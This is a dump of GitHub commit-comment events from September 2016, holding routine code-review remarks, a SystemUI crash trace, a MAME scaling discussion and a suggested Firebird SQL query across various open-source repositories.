{"id":"4577784953","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19064355,"position":null,"line":null,"path":null,"commit_id":"33da4f0426a13037edf7b99596f70d53e78a68bf","created_at":"2016-09-17T11:06:04Z","updated_at":"2016-09-17T11:06:04Z","body":"Bro, this commit will cause systemui crash related to mobiledataindicators in some rom.\r\n\r\n\r\n`--------- beginning of crash E/AndroidRuntime( 5254): FATAL EXCEPTION: PhoneStatusBar E/AndroidRuntime( 5254): Process: com.android.systemui, PID: 5254 E/AndroidRuntime( 5254): java.lang.IllegalArgumentException: method com.android.systemui.statusbar.policy.CallbackHandler.setMobileDataIndicators [XposedOriginal] argument 9 has type int, got java.lang.Boolean E/AndroidRuntime( 5254): \tat de.robv.android.xposed.XposedBridge.invokeOriginalMethodNative(Native Method) E/AndroidRuntime( 5254): \tat de.robv.android.xposed.XposedBridge.handleHookedMethod(XposedBridge.java:334) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.CallbackHandler.setMobileDataIndicators(<Xposed>) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.MobileSignalController.notifyListeners(MobileSignalController.java:334) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.SignalController.notifyListenersIfNecessary(SignalController.java:160) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.MobileSignalController.updateTelephony(MobileSignalController.java:631) E/AndroidRuntime( 5254): \tat de.robv.android.xposed.XposedBridge.invokeOriginalMethodNative(Native Method) E/AndroidRuntime( 5254): \tat de.robv.android.xposed.XposedBridge.handleHookedMethod(XposedBridge.java:334) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.MobileSignalController.updateTelephony(<Xposed>) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.MobileSignalController.setConfiguration(MobileSignalController.java:152) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.NetworkControllerImpl.handleConfigurationChanged(NetworkControllerImpl.java:426) E/AndroidRuntime( 5254): \tat com.android.systemui.statusbar.policy.NetworkControllerImpl$4.run(NetworkControllerImpl.java:418) E/AndroidRuntime( 5254): \tat android.os.Handler.handleCallback(Handler.java:739) E/AndroidRuntime( 5254): \tat android.os.Handler.dispatchMessage(Handler.java:95) E/AndroidRuntime( 5254): \tat android.os.Looper.loop(Looper.java:148) E/AndroidRuntime( 5254): \tat android.os.HandlerThread.run(HandlerThread.java:61) D/PhoneStatusBar( 5254): disable: < EXPAND ICONS* alerts SYSTEM_INFO* BACK HOME RECENT clock SEARCH quick_settings > D/AndroidRuntime( 5254): Shutting down VM I/Process ( 5254): Sending signal. PID: 5254 SIG: 9 38,2136,18446744073709551,-;\r\n`"}},"created_at":"2016-09-17T11:06:04Z"}
{"id":"4577785960","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19064358,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T11:07:00Z","updated_at":"2016-09-17T11:07:00Z","body":"Having thought about this I think the sane approach on ssl failure is to let the user download it using his browser instead of ignoring the failure."}},"created_at":"2016-09-17T11:07:00Z"}
{"id":"4577786595","type":"CommitCommentEvent","actor":{"login":"Lukas1990"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19064359,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-17T11:07:35Z","updated_at":"2016-09-17T11:07:35Z","body":"Hello :) good project, I will later donate you.\r\nBut I need write into /boot/config.txt this text: \"max_usb_current=1\r\nsafe_mode_gpio=4\" but i need more Amp usb output for my usb-HDD, however this file is only for reading, even for root user."}},"created_at":"2016-09-17T11:07:35Z"}
{"id":"4577786709","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/teutoburg"},"payload":{"comment":{"id":19064360,"position":null,"line":null,"path":null,"commit_id":"411473f4a8a0eaa04c778f69c0fcbaf1aedf05d2","created_at":"2016-09-17T11:07:41Z","updated_at":"2016-09-17T11:07:41Z","body":"@drt2016 I enlargenend the images and split some slides. The font size should be 32 pt to be readable from a distance. The image source URL should be right next to the picture, not in a distinct slide at the end; I didn't fix that yet. The beautification is yet to be completed."}},"created_at":"2016-09-17T11:07:41Z"}
{"id":"4577786950","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064361,"position":7,"line":7,"path":"src/UpdateTerms.php","commit_id":"354d13604ed9e1ac2e22e324370541e6a160ea94","created_at":"2016-09-17T11:07:55Z","updated_at":"2016-09-17T11:07:55Z","body":"By mistake. Added."}},"created_at":"2016-09-17T11:07:55Z"}
{"id":"4577787059","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064362,"position":19,"line":19,"path":"src/UpdateTerms.php","commit_id":"354d13604ed9e1ac2e22e324370541e6a160ea94","created_at":"2016-09-17T11:08:01Z","updated_at":"2016-09-17T11:08:01Z","body":"Corrected."}},"created_at":"2016-09-17T11:08:01Z"}
{"id":"4577787143","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064363,"position":null,"line":null,"path":null,"commit_id":"000848957e02dadc5d1059f220f259f0636a31c1","created_at":"2016-09-17T11:08:06Z","updated_at":"2016-09-17T11:08:06Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:08:06Z"}
{"id":"4577787311","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064364,"position":null,"line":null,"path":null,"commit_id":"7077dd17123e9cbc34039d78f9fa21889777b0f6","created_at":"2016-09-17T11:08:14Z","updated_at":"2016-09-17T11:08:14Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:08:14Z"}
{"id":"4577787314","type":"CommitCommentEvent","actor":{"login":"vitalyp"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19064365,"position":null,"line":null,"path":null,"commit_id":"4e07d454ef63df20fc55c28f6268ff9816a0e6a4","created_at":"2016-09-17T11:08:14Z","updated_at":"2016-09-17T11:08:14Z","body":"Should not be dependent on local machine for such trivial tasks . \r\n\r\n- [Check this one](https://codenvy.com/ws/ariekdev/EasyTask) as alternative (I never use it before, it seems works for me).\r\n- Build/Run it. Check it works.\r\n- Commit that code to new git repository.\r\n- [Notify me](https://vk.com)\r\n\r\n_Make a Feel free! to build/run/modify that instance! Don't worries if something going wrong. Good Luck!_"}},"created_at":"2016-09-17T11:08:14Z"}
{"id":"4577787320","type":"CommitCommentEvent","actor":{"login":"ArmyArmyCz"},"repo":{"name":"Rusketh/ExpAdv2"},"payload":{"comment":{"id":19064366,"position":null,"line":null,"path":null,"commit_id":"bba095961f5374263deaca9195b9c9543d9db069","created_at":"2016-09-17T11:08:14Z","updated_at":"2016-09-17T11:08:14Z","body":"Nevermind, you just confused me, I'll try to make the helper better."}},"created_at":"2016-09-17T11:08:14Z"}
{"id":"4577787552","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064367,"position":null,"line":null,"path":null,"commit_id":"326de6e74c70e8db42d1b02ef1adcb215ec1c0f8","created_at":"2016-09-17T11:08:25Z","updated_at":"2016-09-17T11:08:25Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:08:25Z"}
{"id":"4577787757","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064368,"position":null,"line":null,"path":null,"commit_id":"9ea97555820178a413c7214febd98ccfb2739885","created_at":"2016-09-17T11:08:35Z","updated_at":"2016-09-17T11:08:35Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:08:35Z"}
{"id":"4577788893","type":"CommitCommentEvent","actor":{"login":"aDevilInMe"},"repo":{"name":"ThePhD/lua-bench"},"payload":{"comment":{"id":19064369,"position":null,"line":null,"path":null,"commit_id":"a7925e830a7bb3e7ce6d2d4ca9c5cd5b3ddbc048","created_at":"2016-09-17T11:09:34Z","updated_at":"2016-09-17T11:09:34Z","body":"JFYI. What your previous code was modifiying, was a class static variable."}},"created_at":"2016-09-17T11:09:34Z"}
{"id":"4577788954","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064370,"position":7,"line":7,"path":"src/UpdateTerms.php","commit_id":"354d13604ed9e1ac2e22e324370541e6a160ea94","created_at":"2016-09-17T11:09:38Z","updated_at":"2016-09-17T11:09:38Z","body":"Resolved."}},"created_at":"2016-09-17T11:09:38Z"}
{"id":"4577789211","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064371,"position":19,"line":19,"path":"src/UpdateTerms.php","commit_id":"354d13604ed9e1ac2e22e324370541e6a160ea94","created_at":"2016-09-17T11:09:53Z","updated_at":"2016-09-17T11:09:53Z","body":"Resolved."}},"created_at":"2016-09-17T11:09:53Z"}
{"id":"4577790326","type":"CommitCommentEvent","actor":{"login":"bulubebek"},"repo":{"name":"disdain13/PokeRoadie"},"payload":{"comment":{"id":19064372,"position":null,"line":null,"path":null,"commit_id":"0922229bbc67a971d5331a79c1560c926b39205e","created_at":"2016-09-17T11:10:48Z","updated_at":"2016-09-17T11:10:48Z","body":"+1. great job! "}},"created_at":"2016-09-17T11:10:48Z"}
{"id":"4577792877","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064374,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:12:51Z","updated_at":"2016-09-17T11:12:51Z","body":"You said for this file is to define the variables and it's default variable but I can't see termcase_options or termcase_update_terms variables in your module instead of termcase_options I can see this variable termcase_options_ $vocab_machine_name in your code. It means this file is of no use."}},"created_at":"2016-09-17T11:12:51Z"}
{"id":"4577794985","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064377,"position":20,"line":128,"path":"app/Project.php","commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-17T11:14:43Z","updated_at":"2016-09-17T11:14:43Z","body":"итак, в целом, по этому блоку вопросов нет, НО можно проще, ты пытаешься довольно долгим образом получить оригинальное имя файла, возникает вопрос а нафига, вообще в реальности если ты посмотришь на то как в различных CMS никто не пытается заботиться чтобы имя превьюхи было оригинальным, это особо не имеет смысла. \r\n\r\nОтсюда возникает вопрос как проще? самый простой способ гарантировано получить уникальное имя для твоей строки использовать хзш, например классический вариант md5, то есть ты просто строку которую получил из базы оборачиваешь в хэш `$hash = md5($this->attributes['logo']) `тем самым получаешь уникальный идентификатор и его дальше используешь в качестве имени файла. Быстро и просто."}},"created_at":"2016-09-17T11:14:43Z"}
{"id":"4577795109","type":"CommitCommentEvent","actor":{"login":"t0pgun"},"repo":{"name":"smarthackers/GameOfLife"},"payload":{"comment":{"id":19064378,"position":19,"line":19,"path":"views.py","commit_id":"c95ec5b643271a5fc29da3fac322b3fc670502fc","created_at":"2016-09-17T11:14:50Z","updated_at":"2016-09-17T11:14:50Z","body":"I think, may be we shouldn't use 'K'ey and key instead let's do the same stuff as we're doing with \"value\". "}},"created_at":"2016-09-17T11:14:50Z"}
{"id":"4577795392","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064379,"position":null,"line":null,"path":null,"commit_id":"46f66733702058ebe9ca50340ad69997607ec3d2","created_at":"2016-09-17T11:15:07Z","updated_at":"2016-09-17T11:15:07Z","body":"好吧"}},"created_at":"2016-09-17T11:15:07Z"}
{"id":"4577796011","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064381,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:15:39Z","updated_at":"2016-09-17T11:15:39Z","body":"**akashjain132**: What's the use of this file ?\r\n**sonamsingh28**: To define the schema of our variables."}},"created_at":"2016-09-17T11:15:39Z"}
{"id":"4577796015","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064382,"position":7,"line":0,"path":"src/package/standard-cards.cpp","commit_id":"ce5e412f1c9edbe55b34f4613f7d25d339dad70d","created_at":"2016-09-17T11:15:39Z","updated_at":"2016-09-17T11:15:39Z","body":"什么鬼。。。"}},"created_at":"2016-09-17T11:15:39Z"}
{"id":"4577796141","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064384,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:15:45Z","updated_at":"2016-09-17T11:15:45Z","body":"What is schema here ?"}},"created_at":"2016-09-17T11:15:45Z"}
{"id":"4577796395","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064385,"position":null,"line":null,"path":null,"commit_id":"b2a4440b8ca514b9bd79ccb63619ede26b94122b","created_at":"2016-09-17T11:16:00Z","updated_at":"2016-09-17T11:16:00Z","body":"噗"}},"created_at":"2016-09-17T11:16:00Z"}
{"id":"4577796663","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064387,"position":22,"line":130,"path":"app/Project.php","commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-17T11:16:12Z","updated_at":"2016-09-17T11:16:12Z","body":"заметил, что в твоем коде очень много раз встречается имя директории `'/images/logos/thumbs/'`, лучше уйти от этой пагубной практики, чтобы точка изменения пути была в одном месте. Используй для опыта для этого константу в модели. Назови ее например PATH_THUMBS_IMAGE или еще как то и используй ее."}},"created_at":"2016-09-17T11:16:12Z"}
{"id":"4577798138","type":"CommitCommentEvent","actor":{"login":"FNickRU"},"repo":{"name":"FNickRU/Labs"},"payload":{"comment":{"id":19064389,"position":null,"line":null,"path":null,"commit_id":"f1ea73a09b44158388d13dbb0be49bb430e6f42f","created_at":"2016-09-17T11:17:29Z","updated_at":"2016-09-17T11:17:29Z","body":"Поправочка: это не 1.7, а 3 лаба по ООП."}},"created_at":"2016-09-17T11:17:29Z"}
{"id":"4577799594","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064391,"position":27,"line":135,"path":"app/Project.php","commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-17T11:18:44Z","updated_at":"2016-09-17T11:18:44Z","body":"Посмотри официальную документацию по [mkdir](http://php.net/manual/ru/function.mkdir.php) обрати внимание на второй аргумент ;)"}},"created_at":"2016-09-17T11:18:44Z"}
{"id":"4577802050","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19064395,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-17T11:20:54Z","updated_at":"2016-09-17T11:20:54Z","body":"See https://github.com/NixOS/nixpkgs/pull/18689"}},"created_at":"2016-09-17T11:20:54Z"}
{"id":"4577804138","type":"CommitCommentEvent","actor":{"login":"TheNameIsNigel"},"repo":{"name":"CarbonROM/android"},"payload":{"comment":{"id":19064399,"position":null,"line":null,"path":null,"commit_id":"8f020bfc54f8c5a94be255d3c6460fa792cd562b","created_at":"2016-09-17T11:22:47Z","updated_at":"2016-09-17T11:22:47Z","body":"fitemeirl @Myself5 "}},"created_at":"2016-09-17T11:22:47Z"}
{"id":"4577804629","type":"CommitCommentEvent","actor":{"login":"Myself5"},"repo":{"name":"CarbonROM/android"},"payload":{"comment":{"id":19064401,"position":null,"line":null,"path":null,"commit_id":"8f020bfc54f8c5a94be255d3c6460fa792cd562b","created_at":"2016-09-17T11:23:14Z","updated_at":"2016-09-17T11:23:14Z","body":"You broke the repo anyways, check slack :P"}},"created_at":"2016-09-17T11:23:14Z"}
{"id":"4577806160","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19064406,"position":null,"line":null,"path":null,"commit_id":"71be82a0b3e8d3d6af31d6ff1c310c18c75dadf0","created_at":"2016-09-17T11:24:42Z","updated_at":"2016-09-17T11:24:42Z","body":"Two elements can not have same id on same page."}},"created_at":"2016-09-17T11:24:42Z"}
{"id":"4577806369","type":"CommitCommentEvent","actor":{"login":"e-x"},"repo":{"name":"e-x/MicroMonitoring"},"payload":{"comment":{"id":19064407,"position":null,"line":null,"path":null,"commit_id":"aca225d107fb4c9680001a6172d6a45c89e14ccb","created_at":"2016-09-17T11:24:52Z","updated_at":"2016-09-17T11:24:52Z","body":"Test ok"}},"created_at":"2016-09-17T11:24:52Z"}
{"id":"4577807957","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19064408,"position":null,"line":null,"path":null,"commit_id":"3abdb5cbbd54845d8921638d067c86a33450cc76","created_at":"2016-09-17T11:26:16Z","updated_at":"2016-09-17T11:26:16Z","body":"No need to mention the page name in pull commit. Because if multiple files have been modified, it will pull all of them, no a single file.\r\n"}},"created_at":"2016-09-17T11:26:16Z"}
{"id":"4577808150","type":"CommitCommentEvent","actor":{"login":"ImJezze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19064409,"position":null,"line":null,"path":null,"commit_id":"161a08dd4acd792c71d665d3abc16c3093053de8","created_at":"2016-09-17T11:26:30Z","updated_at":"2016-09-17T11:26:30Z","body":"Hi Calamity,\n\nsorry for my very late response. The changes you made provide exactly the\nbehavior I wanted, thank you very much! I would only make one suggestion.\n\n-keepaspect should be deactivated for the fractional scaled axis. For\nexample the fractional scale on the x-axis stops if the target_aspect\nbecomes greater than the src_aspect. The following code would change that\nand should have no unwanted side-effects.\n\n// ignore keepaspect for fractional scaled axis\nbool x_keepaspect = m_keepaspect && (x_is_integer || !y_is_integer);\nbool y_keepaspect = m_keepaspect && (!x_is_integer || y_is_integer);\n\n// now apply desired scale mode and aspect correction\nif (x_keepaspect && target_aspect > src_aspect) xscale *= src_aspect /\ntarget_aspect * (maxyscale / yscale);\nif (y_keepaspect && target_aspect < src_aspect) yscale *= target_aspect /\nsrc_aspect * (maxxscale / xscale);\n\n\nAnd another thing. While testing I found a bug that was already present in\nolder versions of MAME. When using -intoverscan and the image gets scaled\noutside of the window bounds the scaling seems not to be exactly integer\nanymore.\n\nI'm still investigating if this is a problem of the core renderer or\nsomething that has to be handled by the D3D and BGFX renderer.\n\ne.g. tengai -window -nounevenstretch -intoverscan\n\nAs you can see the scanlines are not even anymore, which indicates that the\nscaling might not be integer. However I think the origin of the problem lies\nrather in render_target::add_container_primitives() that in\nrender_target::compute_visible_area().\n\n\n\n\nBest regards\nJezze\n\n\n2016-08-27 22:25 GMT+02:00 antonioginer <notifications@github.com>:\n\n> Hi Jeeze,\n>\n> Please check this when you have a chance:\n> https://github.com/mamedev/mame/pull/1331\n> I've done basic testing here and it seems to work fine, please let me know\n> if the behaviour is the expected.\n>\n> Cheers,\n>\n> Calamity\n>\n>\n> 2016-08-15 9:49 GMT+02:00 ImJezze <notifications@github.com>:\n>\n> > It seems we have to consider every configuration.\n> >\n> > Then I would suggest to implement -unevenstretchy and an additional\n> boolean\n> > flag (e.g. -orientationaware) to enable swapping of the x/y settings\n> > depending on the source/target orientation. This flag would be false\n> > (default) for CRT users and can be set to true for TFT users.\n> >\n> > What do you think about?\n> >\n> >\n> > 2016-08-15 1:06 GMT+02:00 antonioginer <notifications@github.com>:\n> >\n> > > >\n> > > > Correct me if I'm wrong. But a game with portrait orientation + 0°\n> on a\n> > > CRT\n> > > > would not make much sense.\n> > >\n> > >\n> > > It's indeed heterodox, but believe it or not, 99% of people using\n> > cabinets\n> > > with horizontally mounted monitors are playing vertical games that way.\n> > So\n> > > it's an use case we definitely need to consider.\n> > >\n> > > The same goes for landscape orientation + CW90°.\n> > > >\n> > >\n> > > That one is less common, sure.\n> > >\n> > >\n> > > > A new option like -unevestretchy can help, but you will have to\n> create\n> > > > different configurations for portrait and landscape.\n> > >\n> > >\n> > > I know, it sounds less elegant, but it needs to be.\n> > >\n> > >\n> > > If -unevestretchx\n> > > > would be always applied on the long side of the source, no\n> > > differentiation\n> > > > in the configuration is necessary. If I'm not mistaken this would not\n> > > > affect the CRT use cases above.\n> > >\n> > >\n> > > That would mean -unevenstretchx could be applied randomly either on the\n> > > direction of the target monitor scanlines o perpendicularly to them.\n> That\n> > > hijacks the original intention which was having an option that would\n> > > unmistakably apply fractional scaling over the target physical\n> scanlines.\n> > >\n> > > —\n> > > You are receiving this because you were mentioned.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/mamedev/mame/commit/161a08dd4acd792c71d665d3abc16c\n> > 3093053de8#commitcomment-18636412>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/\n> > ALaNpzBpv1FnFj2HAn55t9wMpk5d730tks5qf591gaJpZM4JjyL4>\n> >\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/mamedev/mame/commit/161a08dd4acd792c71d665d3abc16c\n> 3093053de8#commitcomment-18638135>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-\n> auth/AQDAEUTG729UHu9l-eYwMymx_5xhuPTIks5qgBn0gaJpZM4JjyL4>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/161a08dd4acd792c71d665d3abc16c3093053de8#commitcomment-18803738>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALaNp3yW2M-5zvVbhzxrfU7863v8_2SVks5qkJ0fgaJpZM4JjyL4>\n> .\n>\n"}},"created_at":"2016-09-17T11:26:30Z"}
{"id":"4577808199","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19064410,"position":null,"line":null,"path":null,"commit_id":"f9360496579455f8a17ffd95adf780ef19bb7801","created_at":"2016-09-17T11:26:34Z","updated_at":"2016-09-17T11:26:34Z","body":"This branch looks OK, is it ready to become a PR, or are you still waiting to commit something else?"}},"created_at":"2016-09-17T11:26:34Z"}
{"id":"4577810467","type":"CommitCommentEvent","actor":{"login":"TheNameIsNigel"},"repo":{"name":"CarbonROM/android"},"payload":{"comment":{"id":19064412,"position":null,"line":null,"path":null,"commit_id":"8f020bfc54f8c5a94be255d3c6460fa792cd562b","created_at":"2016-09-17T11:28:38Z","updated_at":"2016-09-17T11:28:38Z","body":"Fixed, check notifications :)\r\n"}},"created_at":"2016-09-17T11:28:38Z"}
{"id":"4577811244","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19064414,"position":null,"line":null,"path":null,"commit_id":"5139b0d9d6acd6029355f66d1e3a1fe2e257b8f8","created_at":"2016-09-17T11:29:13Z","updated_at":"2016-09-17T11:29:13Z","body":"You did not pull before pushing this commit."}},"created_at":"2016-09-17T11:29:13Z"}
{"id":"4577811958","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064415,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:29:46Z","updated_at":"2016-09-17T11:29:46Z","body":"Ok. So, in our case we have this dynamic variable(termcase_options_ $vocab_machine_name), so do I remove this file ?"}},"created_at":"2016-09-17T11:29:46Z"}
{"id":"4577811980","type":"CommitCommentEvent","actor":{"login":"ondrej-tuhacek"},"repo":{"name":"dg/dibi"},"payload":{"comment":{"id":19064416,"position":533,"line":533,"path":"dibi/drivers/firebird.php","commit_id":"5e3bc8d0e91a01fe32d0ff2c824520f6e956c545","created_at":"2016-09-17T11:29:47Z","updated_at":"2016-09-17T11:29:47Z","body":"Comma before FROM leads to an invalid SQL."}},"created_at":"2016-09-17T11:29:47Z"}
{"id":"4577812762","type":"CommitCommentEvent","actor":{"login":"bingo20145"},"repo":{"name":"hldai/entity-linking-with-cnn"},"payload":{"comment":{"id":19064418,"position":null,"line":null,"path":null,"commit_id":"08a56e324204a575e33ee1e8ae0f5d6d60e75f4b","created_at":"2016-09-17T11:30:21Z","updated_at":"2016-09-17T11:30:21Z","body":"@hldai Thank you very much！"}},"created_at":"2016-09-17T11:30:21Z"}
{"id":"4577814890","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064421,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:32:12Z","updated_at":"2016-09-17T11:32:12Z","body":"By schema, I referred to 'type' of the variable, it's 'label' etc.\r\nIn case, we are dropping *.settings.yml file, should we remove this file as well ?"}},"created_at":"2016-09-17T11:32:12Z"}
{"id":"4577815438","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19064423,"position":null,"line":null,"path":null,"commit_id":"5139b0d9d6acd6029355f66d1e3a1fe2e257b8f8","created_at":"2016-09-17T11:32:43Z","updated_at":"2016-09-17T11:32:43Z","body":"Your computer's date is wrong? See the date of the commit. It is showing 18th Sep."}},"created_at":"2016-09-17T11:32:43Z"}
{"id":"4577815489","type":"CommitCommentEvent","actor":{"login":"ondrej-tuhacek"},"repo":{"name":"dg/dibi"},"payload":{"comment":{"id":19064424,"position":546,"line":546,"path":"dibi/drivers/firebird.php","commit_id":"5e3bc8d0e91a01fe32d0ff2c824520f6e956c545","created_at":"2016-09-17T11:32:46Z","updated_at":"2016-09-17T11:32:46Z","body":"Shouldn't $table be the referenced table instead of source table?\r\nMaybe something like this?\r\n```\r\n\tpublic function getForeignKeys($table)\r\n\t{\r\n\t\t$table = strtoupper($table);\r\n\t\t$res = $this->query(\r\n            'SELECT '.\r\n                'TRIM(s.RDB$INDEX_NAME) AS INDEX_NAME, '.\r\n\t\t\t\t'TRIM(rc.RDB$CONSTRAINT_NAME) AS CONSTRAINT_NAME, '.\r\n\t\t\t\t'TRIM(i.RDB$RELATION_NAME) AS TABLE_NAME, '.\r\n\t\t\t\t'TRIM(s.RDB$FIELD_NAME) AS FIELD_NAME, '.\r\n\t\t\t\t'TRIM(i2.RDB$RELATION_NAME) AS REFERENCES_TABLE, '.\r\n\t\t\t\t'TRIM(s2.RDB$FIELD_NAME) AS REFERENCES_FIELD '.\r\n\t\t\t'FROM RDB$INDEX_SEGMENTS s '.\r\n\t\t\t\t'LEFT JOIN RDB$INDICES i ON i.RDB$INDEX_NAME = s.RDB$INDEX_NAME '.\r\n\t\t\t\t'LEFT JOIN RDB$RELATION_CONSTRAINTS rc ON rc.RDB$INDEX_NAME = s.RDB$INDEX_NAME '.\r\n\t\t\t\t'LEFT JOIN RDB$REF_CONSTRAINTS refc ON rc.RDB$CONSTRAINT_NAME = refc.RDB$CONSTRAINT_NAME '.\r\n\t\t\t\t'LEFT JOIN RDB$RELATION_CONSTRAINTS rc2 ON rc2.RDB$CONSTRAINT_NAME = refc.RDB$CONST_NAME_UQ '.\r\n\t\t\t\t'LEFT JOIN RDB$INDICES i2 ON i2.RDB$INDEX_NAME = rc2.RDB$INDEX_NAME '.\r\n\t\t\t\t'LEFT JOIN RDB$INDEX_SEGMENTS s2 ON i2.RDB$INDEX_NAME = s2.RDB$INDEX_NAME '.\r\n\t\t\t'WHERE rc.RDB$CONSTRAINT_TYPE = \\'FOREIGN KEY\\' AND rc.RDB$RELATION_NAME = \\''.$table.'\\' '.\r\n\t\t\t'ORDER BY s.RDB$FIELD_POSITION'\r\n\t\t);\r\n\t\t$keys = [];\r\n\t\twhile ($row = $res->fetch(TRUE)) {\r\n\t\t\t$key = $row['CONSTRAINT_NAME'];\r\n\t\t\t$keys[$key] = [\r\n\t\t\t\t'name' => $row['CONSTRAINT_NAME'],\r\n\t\t\t\t'local' => [$row['FIELD_NAME']],\r\n\t\t\t\t'table' => $row['REFERENCES_TABLE'],\r\n                'foreign' => [$row['REFERENCES_FIELD']]\r\n\t\t\t];\r\n\t\t}\r\n\t\treturn $keys;\r\n\t}\r\n```\r\n\r\n"}},"created_at":"2016-09-17T11:32:46Z"}
{"id":"4577815779","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064425,"position":null,"line":null,"path":null,"commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-17T11:33:02Z","updated_at":"2016-09-17T11:33:02Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:33:02Z"}
